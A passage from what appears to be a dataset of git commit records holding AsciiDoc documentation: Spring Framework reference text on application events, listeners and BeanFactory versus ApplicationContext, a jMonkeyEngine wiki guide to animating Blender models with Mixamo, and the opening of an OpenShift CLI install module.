class:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier implements ApplicationListener<BlackListEvent> {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\tpublic void onApplicationEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nNotice that `ApplicationListener` is generically parameterized with the type of your\ncustom event, `BlackListEvent`. This means that the `onApplicationEvent()` method can\nremain type-safe, avoiding any need for downcasting. You may register as many event\nlisteners as you wish, but note that by default event listeners receive events\nsynchronously. This means the `publishEvent()` method blocks until all listeners have\nfinished processing the event. One advantage of this synchronous and single-threaded\napproach is that when a listener receives an event, it operates inside the transaction\ncontext of the publisher if a transaction context is available. If another strategy for\nevent publication becomes necessary, refer to the JavaDoc for Spring's\n`ApplicationEventMulticaster` interface.\n\nThe following example shows the bean definitions used to register and configure each of\nthe classes above:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"emailService\" class=\"example.EmailService\">\n\t\t<property name=\"blackList\">\n\t\t\t<list>\n\t\t\t\t<value>known.spammer@example.org<\/value>\n\t\t\t\t<value>known.hacker@example.org<\/value>\n\t\t\t\t<value>john.doe@example.org<\/value>\n\t\t\t<\/list>\n\t\t<\/property>\n\t<\/bean>\n\n\t<bean id=\"blackListNotifier\" class=\"example.BlackListNotifier\">\n\t\t<property name=\"notificationAddress\" value=\"blacklist@example.org\"\/>\n\t<\/bean>\n----\n\nPutting it all together, when the `sendEmail()` method of the `emailService` bean is\ncalled, if there are any emails that should be blacklisted, a custom event of type\n`BlackListEvent` is published. The `blackListNotifier` bean is registered as an\n`ApplicationListener` and thus receives the `BlackListEvent`, at which point it can\nnotify appropriate parties.\n\n[NOTE]\n====\nSpring's eventing mechanism is designed for simple communication between Spring beans\nwithin the same application context. However, for more sophisticated enterprise\nintegration needs, the separately-maintained\nhttp:\/\/projects.spring.io\/spring-integration\/[Spring Integration] project provides\ncomplete support for building lightweight,\nhttp:\/\/www.enterpriseintegrationpatterns.com[pattern-oriented], event-driven\narchitectures that build upon the well-known Spring programming model.\n====\n\n[[context-functionality-events-annotation]]\n==== Annotation-based Event Listeners\n\nAs of Spring 4.2, an event listener can be registered on any public method of a managed\nbean via the `EventListener` annotation. The `BlackListNotifier` can be rewritten as\nfollows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class BlackListNotifier {\n\n\t\tprivate String notificationAddress;\n\n\t\tpublic void setNotificationAddress(String notificationAddress) {\n\t\t\tthis.notificationAddress = notificationAddress;\n\t\t}\n\n\t\t@EventListener\n\t\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\t\/\/ notify appropriate parties via notificationAddress...\n\t\t}\n\n\t}\n----\n\nAs you can see above, the method signature actually _infer_ which even type it listens to. This\nalso works for nested generics as long as the actual event resolves the generics parameter you\nwould filter on.\n\nIf your method should listen to several events or if you want to define it with no\nparameter at all, the event type(s) can also be specified on the annotation itself:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener({ContextStartedEvent.class, ContextRefreshedEvent.class})\n\tpublic void handleContextStart() {\n\n\t}\n----\n\n\nIt is also possible to add additional runtime filtering via the `condition` attribute of the\nannotation that defines a <<expressions,`SpEL` expression>> that should match to actually invoke\nthe method for a particular event.\n\nFor instance, our notifier can be rewritten to be only invoked if the `test` attribute of the\nevent is equal to `foo`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener(condition = \"#event.test == 'foo'\")\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\nEach `SpEL` expression evaluates again a dedicated context. The next table lists the items made\navailable to the context so one can use them for conditional event processing:\n\n[[context-functionality-events-annotation-tbl]]\n.Event SpEL available metadata\n|===\n| Name| Location| Description| Example\n\n| event\n| root object\n| The actual `ApplicationEvent`\n| `#root.event`\n\n| args\n| root object\n| The arguments (as array) used for invoking the target\n| `#root.args[0]`\n\n| __argument name__\n| evaluation context\n| Name of any of the method arguments. If for some reason the names are not available\n (e.g. no debug information), the argument names are also available under the `#a<#arg>`\n where __#arg__ stands for the argument index (starting from 0).\n| `#iban` or `#a0` (one can also use `#p0` or `#p<#arg>` notation as an alias).\n|===\n\nNote that `#root.event` allows you to access to the underlying event, even if your method\nsignature actually refers to an arbitrary object that was published.\n\nIf you need to publish an event as the result of processing another, just change the\nmethod signature to return the event that should be published, something like:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic ListUpdateEvent handleBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress and\n\t\t\/\/ then publish a ListUpdateEvent...\n\t}\n----\n\nNOTE: This feature is not supported for <<context-functionality-events-async,asynchronous\nlisteners>>.\n\nThis new method will publish a new `ListUpdateEvent` for every `BlackListEvent` handled\nby the method above. If you need to publish several events, just return a `Collection` of\nevents instead.\n\n[[context-functionality-events-async]]\n==== Asynchronous Listeners\n\nIf you want a particular listener to process events asynchronously, simply reuse the\n<<scheduling-annotation-support-async,regular `@Async` support>>:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Async\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ BlackListEvent is processed in a separate thread\n\t}\n----\n\nBe aware of the following limitations when using asynchronous events:\n\n. If the event listener throws an `Exception` it will not be propagated to the caller,\n check `AsyncUncaughtExceptionHandler` for more details.\n. Such event listener cannot send replies. If you need to send another event as the\n result of the processing, inject `ApplicationEventPublisher` to send the event\n manually.\n\n\n[[context-functionality-events-order]]\n==== Ordering Listeners\n\nIf you need the listener to be invoked before another one, just add the `@Order`\nannotation to the method declaration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\t@Order(42)\n\tpublic void processBlackListEvent(BlackListEvent event) {\n\t\t\/\/ notify appropriate parties via notificationAddress...\n\t}\n----\n\n[[context-functionality-events-generics]]\n==== Generic Events\n\nYou may also use generics to further define the structure of your event. Consider an\n`EntityCreatedEvent<T>` where `T` is the type of the actual entity that got created. You\ncan create the following listener definition to only receive `EntityCreatedEvent` for a\n`Person`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@EventListener\n\tpublic void onPersonCreated(EntityCreatedEvent<Person> event) {\n\t\t...\n\t}\n----\n\n\nDue to type erasure, this will only work if the event that is fired resolves the generic\nparameter(s) on which the event listener filters on (that is something like\n`class PersonCreatedEvent extends EntityCreatedEvent<Person> { ... }`).\n\nIn certain circumstances, this may become quite tedious if all events follow the same\nstructure (as it should be the case for the event above). In such a case, you can\nimplement `ResolvableTypeProvider` to _guide_ the framework beyond what the runtime\nenvironment provides:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class EntityCreatedEvent<T>\n \t\textends ApplicationEvent implements ResolvableTypeProvider {\n\n \tpublic EntityCreatedEvent(T entity) {\n \t\tsuper(entity);\n \t}\n\n \t@Override\n \tpublic ResolvableType getResolvableType() {\n \t\treturn ResolvableType.forClassWithGenerics(getClass(),\n \t\t\t\tResolvableType.forInstance(getSource()));\n \t}\n }\n----\n\n[TIP]\n====\nThis works not only for `ApplicationEvent` but any arbitrary object that you'd send as\nan event.\n====\n\n\n\n[[context-functionality-resources]]\n=== Convenient access to low-level resources\n\nFor optimal usage and understanding of application contexts, users should generally\nfamiliarize themselves with Spring's `Resource` abstraction, as described in the chapter\n<<resources>>.\n\nAn application context is a `ResourceLoader`, which can be used to load ``Resource``s. A\n`Resource` is essentially a more feature rich version of the JDK class `java.net.URL`,\nin fact, the implementations of the `Resource` wrap an instance of `java.net.URL` where\nappropriate. A `Resource` can obtain low-level resources from almost any location in a\ntransparent fashion, including from the classpath, a filesystem location, anywhere\ndescribable with a standard URL, and some other variations. If the resource location\nstring is a simple path without any special prefixes, where those resources come from is\nspecific and appropriate to the actual application context type.\n\nYou can configure a bean deployed into the application context to implement the special\ncallback interface, `ResourceLoaderAware`, to be automatically called back at\ninitialization time with the application context itself passed in as the\n`ResourceLoader`. You can also expose properties of type `Resource`, to be used to\naccess static resources; they will be injected into it like any other properties. You\ncan specify those `Resource` properties as simple String paths, and rely on a special\nJavaBean `PropertyEditor` that is automatically registered by the context, to convert\nthose text strings to actual `Resource` objects when the bean is deployed.\n\nThe location path or paths supplied to an `ApplicationContext` constructor are actually\nresource strings, and in simple form are treated appropriately to the specific context\nimplementation. `ClassPathXmlApplicationContext` treats a simple location path as a\nclasspath location. You can also use location paths (resource strings) with special\nprefixes to force loading of definitions from the classpath or a URL, regardless of the\nactual context type.\n\n\n\n[[context-create]]\n=== Convenient ApplicationContext instantiation for web applications\n\nYou can create `ApplicationContext` instances declaratively by using, for example, a\n`ContextLoader`. Of course you can also create `ApplicationContext` instances\nprogrammatically by using one of the `ApplicationContext` implementations.\n\nYou can register an `ApplicationContext` using the `ContextLoaderListener` as follows:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<context-param>\n\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t<param-value>\/WEB-INF\/daoContext.xml \/WEB-INF\/applicationContext.xml<\/param-value>\n\t<\/context-param>\n\n\t<listener>\n\t\t<listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n\t<\/listener>\n----\n\nThe listener inspects the `contextConfigLocation` parameter. If the parameter does not\nexist, the listener uses `\/WEB-INF\/applicationContext.xml` as a default. When the\nparameter __does__ exist, the listener separates the String by using predefined\ndelimiters (comma, semicolon and whitespace) and uses the values as locations where\napplication contexts will be searched. Ant-style path patterns are supported as well.\nExamples are `\/WEB-INF\/{asterisk}Context.xml` for all files with names ending with \"Context.xml\",\nresiding in the \"WEB-INF\" directory, and `\/WEB-INF\/**\/*Context.xml`, for all such files\nin any subdirectory of \"WEB-INF\".\n\n\n\n[[context-deploy-rar]]\n=== Deploying a Spring ApplicationContext as a Java EE RAR file\n\nIt is possible to deploy a Spring ApplicationContext as a RAR file, encapsulating the\ncontext and all of its required bean classes and library JARs in a Java EE RAR deployment\nunit. This is the equivalent of bootstrapping a standalone ApplicationContext, just hosted\nin Java EE environment, being able to access the Java EE servers facilities. RAR deployment\nis more natural alternative to scenario of deploying a headless WAR file, in effect, a WAR\nfile without any HTTP entry points that is used only for bootstrapping a Spring\nApplicationContext in a Java EE environment.\n\nRAR deployment is ideal for application contexts that do not need HTTP entry points but\nrather consist only of message endpoints and scheduled jobs. Beans in such a context can\nuse application server resources such as the JTA transaction manager and JNDI-bound JDBC\nDataSources and JMS ConnectionFactory instances, and may also register with the\nplatform's JMX server - all through Spring's standard transaction management and JNDI\nand JMX support facilities. Application components can also interact with the\napplication server's JCA WorkManager through Spring's `TaskExecutor` abstraction.\n\nCheck out the JavaDoc of the\n{api-spring-framework}\/jca\/context\/SpringContextResourceAdapter.html[`SpringContextResourceAdapter`]\nclass for the configuration details involved in RAR deployment.\n\n__For a simple deployment of a Spring ApplicationContext as a Java EE RAR file:__ package\nall application classes into a RAR file, which is a standard JAR file with a different\nfile extension. Add all required library JARs into the root of the RAR archive. Add a\n\"META-INF\/ra.xml\" deployment descriptor (as shown in ``SpringContextResourceAdapter``s\nJavaDoc) and the corresponding Spring XML bean definition file(s) (typically\n\"META-INF\/applicationContext.xml\"), and drop the resulting RAR file into your\napplication server's deployment directory.\n\n[NOTE]\n====\nSuch RAR deployment units are usually self-contained; they do not expose components to\nthe outside world, not even to other modules of the same application. Interaction with a\nRAR-based ApplicationContext usually occurs through JMS destinations that it shares with\nother modules. A RAR-based ApplicationContext may also, for example, schedule some jobs,\nreacting to new files in the file system (or the like). If it needs to allow synchronous\naccess from the outside, it could for example export RMI endpoints, which of course may\nbe used by other application modules on the same machine.\n====\n\n\n\n\n[[beans-beanfactory]]\n== The BeanFactory\nThe `BeanFactory` provides the underlying basis for Spring's IoC functionality but it is\nonly used directly in integration with other third-party frameworks and is now largely\nhistorical in nature for most users of Spring. The `BeanFactory` and related interfaces,\nsuch as `BeanFactoryAware`, `InitializingBean`, `DisposableBean`, are still present in\nSpring for the purposes of backward compatibility with the large number of third-party\nframeworks that integrate with Spring. Often third-party components that can not use\nmore modern equivalents such as `@PostConstruct` or `@PreDestroy` in order to remain\ncompatible with JDK 1.4 or to avoid a dependency on JSR-250.\n\nThis section provides additional background into the differences between the\n`BeanFactory` and `ApplicationContext` and how one might access the IoC container\ndirectly through a classic singleton lookup.\n\n\n\n[[context-introduction-ctx-vs-beanfactory]]\n=== BeanFactory or ApplicationContext?\n\nUse an `ApplicationContext` unless you have a good reason for not doing so.\n\nBecause the `ApplicationContext` includes all functionality of the `BeanFactory`, it is\ngenerally recommended over the `BeanFactory`, except for a few situations such as in\nembedded applications running on resource-constrained devices where memory consumption\nmight be critical and a few extra kilobytes might make a difference. However, for\nmost typical enterprise applications and systems, the `ApplicationContext` is what you\nwill want to use. Spring makes __heavy__ use of the <<beans-factory-extension-bpp,\n`BeanPostProcessor` extension point>> (to effect proxying and so on). If you use only a\nplain `BeanFactory`, a fair amount of support such as transactions and AOP will not take\neffect, at least not without some extra steps on your part. This situation could be\nconfusing because nothing is actually wrong with the configuration.\n\nThe following table lists features provided by the `BeanFactory` and\n`ApplicationContext` interfaces and implementations.\n\n[[context-introduction-ctx-vs-beanfactory-feature-matrix]]\n.Feature Matrix\n|===\n| Feature| `BeanFactory`| `ApplicationContext`\n\n| Bean instantiation\/wiring\n| Yes\n| Yes\n\n| Automatic `BeanPostProcessor` registration\n| No\n| Yes\n\n| Automatic `BeanFactoryPostProcessor` registration\n| No\n| Yes\n\n| Convenient `MessageSource` access (for i18n)\n| No\n| Yes\n\n| `ApplicationEvent` publication\n| No\n| Yes\n|===\n\nTo explicitly register a bean post-processor with a `BeanFactory` implementation,\nyou need to write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\t\/\/ populate the factory with bean definitions\n\n\t\/\/ now register any needed BeanPostProcessor instances\n\tMyBeanPostProcessor postProcessor = new MyBeanPostProcessor();\n\tfactory.addBeanPostProcessor(postProcessor);\n\n\t\/\/ now start using the factory\n----\n\nTo explicitly register a `BeanFactoryPostProcessor` when using a `BeanFactory`\nimplementation, you must write code like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tDefaultListableBeanFactory factory = new DefaultListableBeanFactory();\n\tXmlBeanDefinitionReader reader = new XmlBeanDefinitionReader(factory);\n\treader.loadBeanDefinitions(new FileSystemResource(\"beans.xml\"));\n\n\t\/\/ bring in some property values from a Properties file\n\tPropertyPlaceholderConfigurer cfg = new PropertyPlaceholderConfigurer();\n\tcfg.setLocation(new FileSystemResource(\"jdbc.properties\"));\n\n\t\/\/ now actually do the replacement\n\tcfg.postProcessBeanFactory(factory);\n----\n\nIn both cases, the explicit registration step is inconvenient, which is one reason why\nthe various `ApplicationContext` implementations are preferred above plain `BeanFactory`\nimplementations in the vast majority of Spring-backed applications, especially when\nusing ``BeanFactoryPostProcessor``s and ``BeanPostProcessor``s. These mechanisms implement\nimportant functionality such as property placeholder replacement and AOP.\n\n\n\n[[beans-servicelocator]]\n=== Glue code and the evil singleton\n\nIt is best to write most application code in a dependency-injection (DI) style, where\nthat code is served out of a Spring IoC container, has its own dependencies supplied by\nthe container when it is created, and is completely unaware of the container. However,\nfor the small glue layers of code that are sometimes needed to tie other code together,\nyou sometimes need a singleton (or quasi-singleton) style access to a Spring IoC\ncontainer. For example, third-party code may try to construct new objects directly (\n`Class.forName()` style), without the ability to get these objects out of a Spring IoC\ncontainer.If the object constructed by the third-party code is a small stub or proxy,\nwhich then uses a singleton style access to a Spring IoC container to get a real object\nto delegate to, then inversion of control has still been achieved for the majority of\nthe code (the object coming out of the container). Thus most code is still unaware of\nthe container or how it is accessed, and remains decoupled from other code, with all\nensuing benefits. EJBs may also use this stub\/proxy approach to delegate to a plain Java\nimplementation object, retrieved from a Spring IoC container. While the Spring IoC\ncontainer itself ideally does not have to be a singleton, it may be unrealistic in terms\nof memory usage or initialization times (when using beans in the Spring IoC container\nsuch as a Hibernate `SessionFactory`) for each bean to use its own, non-singleton Spring\nIoC container.\n\nLooking up the application context in a service locator style is sometimes the only\noption for accessing shared Spring-managed components, such as in an EJB 2.1\nenvironment, or when you want to share a single ApplicationContext as a parent to\nWebApplicationContexts across WAR files. In this case you should look into using the\nutility class\n{api-spring-framework}\/context\/access\/ContextSingletonBeanFactoryLocator.html[`ContextSingletonBeanFactoryLocator`]\nlocator that is described in this\nhttps:\/\/spring.io\/blog\/2007\/06\/11\/using-a-shared-parent-application-context-in-a-multi-war-spring-application\/[Spring\nteam blog entry].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bb69ff0adb524fc1de568f5b7e2493d80eb006b8","subject":"Update mixamo.adoc","message":"Update mixamo.adoc","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/mixamo.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/mixamo.adoc","new_contents":"= Mixamo Animation\n:author: \n:revnumber: \n:revdate: 2017\/05\/25 13:04\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n[NOTE]\n====\nIn the near future the Mixamo website will be undergoing some changes that will have some level of effect upon how you animate your character. The only real difference that Adobe says will happen, with respect to auto-rigging your characters, is you no longer can store the assets on the Mixamo website. See this link:http:\/\/blogs.adobe.com\/adobecare\/2017\/05\/23\/download-assets-from-mixamo\/[notice] for more info.\n====\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobes Mixamo to fully animate your Blender models. Once you understand the process that is. This guide uses link:https:\/\/www.blender.org\/download\/[Blender version 2.78c] with its default settings along with the Ogre exporter 0.6.0 found <<jme3\/advanced\/ogrecompatibility.html,here>>. You will need to have FBX file Importing and Exporting initialized in Blender. This can be found under `menu:File[User Preferences > Add-ons]` in the Info header at the top of the program. Be sure to toggle btn:[Auto Run Python Scripts] in the `menu:User Preferences[File]` tab.\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you must follow.\n\n* Read the link:https:\/\/community.mixamo.com\/hc\/en-us\/articles\/210310918-Auto-Rigger-Troubleshooting[Auto-Rig Error Troubleshooting] guide before you do anything else.\n\n* Clean up your Blender file before exporting. This means you have a game ready model that will become the base for all your animations. The following checklist is provided for your convienence.\n[% interactive]\n- [ ] You have no Animations.\n- [ ] You have no Actions stored in the Dope Sheet Action Editor btn:[Browse Action to be linked] buffer.\n- [ ] You have UV Mapped your model.\n- [ ] You have one Material named the same as your mesh.\n- [ ] You have baked and packed your Texture (ie, your using a texture atlas).\n- [ ] You have cleared the UV, Material and Texture buffers of unused images, materials and textures.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Unit Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. Besides that, JME3 uses 1 WU = 1 Meter so this will keep things consistant. If you are doing this now, you may have to rescale your model before proceding.\n\n\n== Export\n\n\n.Blender\n. In the 3d viewport select your model, it will be high-lighted in orange.\n. In the `Info` header at the top of the program select `menu:File[Export > FBX]`.\n\n.FBX Exporter\n. Enter a file path to export to, usually the same directory as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the open window, under the `Main` tab, toggle on the checkbox `Selected Objects`.\n. Leave the `Scale` at 1 but click the button next to it to turn off btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n. Leave the `Forward` and `Up` axis at the default of `-Z Forward` and `Y Up`.\n. Under `Which kind of object to export` deselect everything but `Mesh`. \n. Under the `Geometries` tab, select `Apply Modifiers`.\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n\n== Import\n\n\n.Mixamo\n. Create an link:https:\/\/www.mixamo.com\/[Mixamo] account and login.\n. Navigate to your `My Assets` directory.\n. Select `Upload`.\n. Navigate to the file to be uploaded or drag and drop it onto the file uploader.\n\n\n== Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding. \n\n. If the model is facing you click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the image. \n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n+\n[NOTE]\n====\nThis may take some time and if the model does not appear within 2 minutes something has went wrong and you will have to restart the upload process over. This is a trail blazing process so keep that in mind. \n====\n\nWhen the model appears, click through to the end of the process.\n\n\n== Download\n\n\nNavigate to `My Assets`. You should now see your model in a TPose position. This will be your base model for all animations. We will also use it as our newly rigged model for Blender.\n\n. Select the TPose model and then click the btn:[Queue Download] button.\n. In the `Download Settings` dialog the `Format` is FBX and `Pose` is TPose.\n. Click the btn:[Queue Download] button.\n\nAfter the file is ready, it will be in your `Downloads` directory on Mixamo.\n\nClick the btn:[Queue Download] button under `Status`, rename the file to TPose and save the it to your computer. Preferably in the same directory as your blender file.\n\n\n== Preparing Blender for Animations\n\n\nBefore you can import any animations from Mixamo, you should have a file that is separate from the model file you exported earlier. Although its not required, it's best to do so. Things can go wrong and you dont want to destroy your model file by accident so it's always best to keep things separate. With that said lets begin.\n\n.Blender\n. In the `Info` header at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\n. In the `Properties Panel, located at the bottom right, select the `Scene` tab. In the `Units` panel change the `Units of measure` to `Meters` and `Length' to `Metric`.\n\n[TIP]\n====\nYou should create and save a default startup file in Blender. `menu:File[Save Startup File]`. This way you will not have to constantly redo things. Setting your `Units of measure` is the first thing you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n","old_contents":"= Mixamo Animation\n:author: \n:revnumber: \n:revdate: 2017\/05\/25 13:04\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n[NOTE]\n====\nIn the near future the Mixamo website will be undergoing some changes that will have some level of effect upon how you animate your character. The only real difference that Adobe says will happen, with respect to auto-rigging your characters, is you no longer can store the assets on the Mixamo website. See this link:http:\/\/blogs.adobe.com\/adobecare\/2017\/05\/23\/download-assets-from-mixamo\/[notice] for more info.\n====\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobes Mixamo to fully animate your Blender models. Once you understand the process that is. This guide uses link:https:\/\/www.blender.org\/download\/[Blender version 2.78c] with its default settings along with the Ogre exporter 0.6.0 found <<jme3\/advanced\/ogrecompatibility.html,here>>. You will need to have FBX file Importing and Exporting initialized in Blender. This can be found under `menu:File[User Preferences > Add-ons]` in the Info header at the top of the program. Be sure to toggle btn:[Auto Run Python Scripts] in the `menu:User Preferences[File]` tab.\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you must follow.\n\n* Read the link:https:\/\/community.mixamo.com\/hc\/en-us\/articles\/210310918-Auto-Rigger-Troubleshooting[Auto-Rig Error Troubleshooting] guide before you do anything else.\n\n* Clean up your Blender file before exporting. This means you have a game ready model that will become the base for all your animations. The following checklist is provided for your convienence.\n[% interactive]\n- [ ] You have no Animations.\n- [ ] You have no Actions stored in the Dope Sheet Action Editor btn:[Browse Action to be linked] buffer.\n- [ ] You have UV Mapped your model.\n- [ ] You have one Material named the same as your mesh.\n- [ ] You have baked and packed your Texture (ie, your using a texture atlas).\n- [ ] You have cleared the UV, Material and Texture buffers of unused images, materials and textures.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Unit Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. Besides that, JME3 uses 1 WU = 1 Meter so this will keep things consistant. If you are doing this now, you may have to rescale your model before proceding.\n\n\n== Export\n\n\n.Blender\n. In the 3d viewport select your model, it will be high-lighted in orange.\n. In the `Info` header at the top of the program select `menu:File[Export > FBX]`.\n\n.FBX Exporter\n. Enter a file path to export to, usually the same directory as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the open window, under the `Main` tab, toggle on the checkbox `Selected Objects`.\n. Leave the `Scale` at 1 but click the button next to it to turn off btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n. Leave the `Forward` and `Up` axis at the default of `-Z Forward` and `Y Up`.\n. Under `Which kind of object to export` deselect everything but `Mesh`. \n. Under the `Geometries` tab, select `Apply Modifiers`.\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n\n== Import\n\n\n.Mixamo\n. Create an link:https:\/\/www.mixamo.com\/[Mixamo] account and login.\n. Navigate to your `My Assets` directory.\n. Select `Upload`.\n. Navigate to the file to be uploaded or drag and drop it onto the file uploader.\n\n\n== Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding. \n\n. If the model is facing you click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the image. \n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n+\n[NOTE]\n====\nThis may take some time and if the model does not appear within 2 minutes something has went wrong and you will have to restart the upload process over. This is a trail blazing process so keep that in mind. \n====\n\nWhen the model appears, click through to the end of the process.\n\n\u3000\n== Download\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"4e7bed8a6649f86e53cb86879b3f0398408724d1","subject":"GitHub-32555: Updating location to download the CLI","message":"GitHub-32555: Updating location to download the CLI\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cli-installing-cli.adoc","new_file":"modules\/cli-installing-cli.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * cli_reference\/openshift_cli\/getting-started.adoc\n\/\/ * installing\/installing_aws\/installing-aws-user-infra.adoc\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-default.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_aws\/installing-restricted-networks-aws-installer-provisioned.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-default.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_azure\/installing-azure-user-infra.adoc\n\/\/ * installing\/installing_bare_metal\/installing-bare-metal.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-default.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-user-infra.adoc\n\/\/ * installing\/installing_gcp\/installing-restricted-networks-gcp-installer-provisioned.adoc\n\/\/ * installing\/install_config\/installing-restricted-networks-preparations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-user-infra.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-vmc-network-customizations.adoc\n\/\/ * installing\/installing_vmc\/installing-restricted-networks-vmc.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-network-customizations.adoc\n\/\/ * installing\/installing_vsphere\/installing-restricted-networks-installer-provisioned-vsphere.adoc\n\/\/ * installing\/installing_ibm_z\/installing-ibm-z.adoc\n\/\/ * openshift_images\/samples-operator-alt-registry.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-customizations.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-default.adoc\n\/\/ * updating\/updating-restricted-network-cluster.adoc\n\/\/\n\/\/ AMQ docs link to this; do not change anchor\n\nifeval::[\"{context}\" == \"updating-restricted-network-cluster\"]\n:restricted:\nendif::[]\n\n[id=\"cli-installing-cli_{context}\"]\n= Installing the OpenShift CLI by downloading the binary\n\nYou can install the OpenShift CLI (`oc`) to interact with {product-title} 